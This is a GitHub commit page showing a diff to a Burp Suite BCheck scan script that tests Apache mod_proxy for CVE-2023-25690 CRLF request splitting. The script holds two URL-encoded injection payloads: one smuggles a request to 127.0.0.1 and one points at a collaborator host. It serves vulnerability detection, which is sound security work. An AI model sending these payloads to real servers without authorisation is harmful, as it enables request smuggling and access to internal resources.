Skip to content

Commit

Permalink
Merge pull request #182 from PortSwigger/issue_181
Browse files Browse the repository at this point in the history
Only issue payloads if base response status code not 200 (Fixes Issue…
  • Loading branch information
Hannah-PortSwigger authored Feb 22, 2024
2 parents 604dfcc + 81d874c commit 9142f72
Showing 1 changed file with 28 additions and 23 deletions.
Original file line number Diff line number Diff line change
@@ -1,33 +1,38 @@
metadata:
language: v1-beta
language: v2-beta
name: "CVE-2023-25690"
description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690"
author: "Peyton Kennedy"

define:
injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload1 = `%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 = `%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`

given request then
send request called split:
method: "GET"
appending path: {injected_payload1}
send request called oob:
method: "GET"
appending path: {injected_payload2}
if not({base.response.status_code} is "200") then
send request called split:
method: "GET"
appending path: {injected_payload1}

if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then
report issue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
send request called oob:
method: "GET"
appending path: {injected_payload2}

if {split.response.body} matches "\"statusCode\":200" or
{latest.response.status_code} is "200" then
report issue and continue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if

if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
end if

if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if

0 comments on commit 9142f72

Please sign in to comment.